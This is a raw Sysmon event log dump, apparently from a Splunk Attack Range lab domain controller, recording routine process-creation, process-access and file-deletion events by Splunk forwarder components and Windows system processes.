Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F95D32D4AAE530D36327190138F3384,SHA256=30C7E14BBAD0DD5C61EDBD666612979B8288770E2D9497D598206BBBF7641C7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049974Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:53.199{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C10526FC81A4B2AF2E3616E95C538C22,SHA256=015B1D8B70BE62D0F7B1C96D75898D8F24F5E8AF4C14C6EEE430DF3B3BE10892,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049993Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:54.855{5EBD8912-8A9E-6151-2F7A-00000000FC01}60286040C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049992Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:54.598{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8A9E-6151-2F7A-00000000FC01}6028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049991Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:54.598{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049990Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:54.598{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049989Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:54.598{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049988Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:54.598{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049987Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:54.598{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8A9E-6151-2F7A-00000000FC01}6028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049986Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:54.598{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8A9E-6151-2F7A-00000000FC01}6028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049985Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:54.583{5EBD8912-8A9E-6151-2F7A-00000000FC01}6028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001049984Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:54.336{5EBD8912-8A9E-6151-2E7A-00000000FC01}70045336C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049983Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:54.213{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE600D0F791D035D247B808C2BAD916C,SHA256=678FBDEF6A32ACFCAD3DF78834BFD174ECADC3661747FFAD600881D483F750A8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049982Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:54.067{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8A9E-6151-2E7A-00000000FC01}7004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049981Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:54.067{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049980Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:54.067{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049979Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:54.067{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049978Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:54.067{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8A9E-6151-2E7A-00000000FC01}7004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049977Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:54.067{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049976Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:54.067{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8A9E-6151-2E7A-00000000FC01}7004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049975Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:54.052{5EBD8912-8A9E-6151-2E7A-00000000FC01}7004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001050012Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:55.917{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050011Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:55.869{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8A9F-6151-317A-00000000FC01}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050010Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:55.866{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050009Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:55.866{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050008Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:55.866{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050007Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:55.866{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050006Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:55.866{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8A9F-6151-317A-00000000FC01}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050005Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:55.865{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8A9F-6151-317A-00000000FC01}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050004Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:55.848{5EBD8912-8A9F-6151-317A-00000000FC01}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001050003Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 